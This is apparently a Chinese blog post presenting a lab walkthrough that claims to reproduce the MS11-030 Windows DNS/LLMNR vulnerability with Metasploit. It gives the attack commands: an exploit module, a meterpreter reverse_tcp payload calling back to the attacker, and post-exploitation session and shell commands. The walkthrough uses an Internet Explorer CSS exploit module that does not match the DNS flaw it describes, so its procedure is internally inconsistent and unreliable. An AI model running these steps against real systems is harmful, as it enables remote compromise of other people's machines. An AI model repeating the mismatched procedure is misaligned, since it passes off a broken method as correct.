MS11-030-DNS 解析漏洞复现

 

MS11-030:DNS 解析中的漏洞允许远程代码执行 (2509553)

安装的 Windows DNS 客户端处理链接-本地多播名称解析 (LLMNR) 查询的方法中存在一个缺陷,攻击者可利用此缺陷在 NetworkService 帐户的上下文中执行任意代码。

请注意,Windows XP 和 2003 不支持 LLMNR。要在这些平台上成功利用此漏洞,需要本地访问权限以及运行特殊应用程序的权限。但是,在 Windows Vista、2008、7 和 2008 R2 中,可以远程利用此漏洞。

Microsoft 已发布一系列用于 Windows XP、2003、Vista、2008、7 和 2008 R2 的修补程序。

复现准备

靶机:Win xp,2003,win7,and 2008R2

攻击机:kali

漏洞扫描

使用Nessus进行漏洞扫描,发现主机存在ms11-030漏洞

漏洞利用 

启动msf

msfconsole

选择漏洞利用exp

use exploit/windows/browser/ms11_003_ie_css_import

 查看配置参数

show options

设置生成的恶意网页的URL为baidu.com

为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080

设置LHOST以绑定本地IP

运行命令“exploit”或者“run”开始进行攻击,

生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页

设置攻击载荷

set payload windows/meterpreter/reverse_tcp

目标用户上线成功,回连攻击机

sessions   列出所有会话
sessions -i 1   进入1号会话
getuid   查看当前用户
shell    进入交换式cmd界面
chcp 65001 乱码编译

 可以看到获取到IP地址

 

建议开启windows更新,开启防火墙。打上对应的补丁包 

(同时可以利用MSF配合CS上线提权)

  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

engDlin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值